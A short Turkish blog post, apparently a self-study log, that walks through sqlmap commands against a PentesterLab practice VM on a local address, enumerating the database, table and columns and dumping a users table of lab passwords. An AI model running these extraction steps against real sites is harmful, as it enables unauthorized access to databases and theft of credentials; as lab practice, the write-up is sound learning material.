18 Şub 2016 @ 11:29 AM 

SQLmap kullanım testlerini yapabilmemiz için https://pentesterlab.com/exercises/web_for_pentester adresinden indirdim. Hazır iso dosyasının kurulumunu yaptım

sqlinjetions ve diğer açıklarla ilgili örnekleri yapabilmemiz için hazır ….

database ismini buluyoruz..

sqlmap -u “http://192.168.1.8/sqli/example5.php?id=2″ –dbs

şimdi table ‘ları buluyoruz.

sqlmap -u “http://192.168.1.8/sqli/example5.php?id=2″ –tables -D exercises

Database: exercises
[1 table]
+——-+
| users |
+——-+

tek tablomuz varmış…

*******************************

Columns buluyoruz…

sqlmap -u “http://192.168.1.8/sqli/example5.php?id=2″ –columns -D exercises -T users

Database: exercises
Table: users
[5 columns]
+———+————-+
| Column  | Type        |
+———+————-+
| age     | int(11)     |
| groupid | int(11)     |
| id      | int(11)     |
| name    | varchar(50) |
| passwd  | varchar(50) |
+———+————-+
************************************************

şimdi içerikleri görelim

sqlmap -u “http://192.168.1.8/sqli/example5.php?id=2″ –dump -D exercises -T users

Database: exercises
Table: users
[4 entries]
+—-+———+—–+——-+———+
| id | groupid | age | name  | passwd  |
+—-+———+—–+——-+———+
| 1  | 10      | 10  | admin | admin   |
| 2  | 0       | 30  | root  | admin21 |
| 3  | 2       | 5   | user1 | secret  |
| 5  | 5       | 2   | user2 | azerty  |
+—-+———+—–+——-+———+
************************************************************

Posted By: Hakan NİŞANCI
Last Edit: 07 Mar 2019 @ 04:02 PM

EmailPermalink
Tags
Categories: Self Study


 

Responses to this post » (None)

 

Sorry, but comments are closed. Check out another post and speak up!

Tags
Comment Meta:
RSS Feed for comments

 Last 50 Posts
Change Theme...
  • Users » 1
  • Posts/Pages » 9
  • Comments » 0
Change Theme...
  • VoidVoid « Default
  • LifeLife
  • EarthEarth
  • WindWind
  • WaterWater
  • FireFire
  • LightLight

Örnek sayfa



    No Child Pages.

About



    No Child Pages.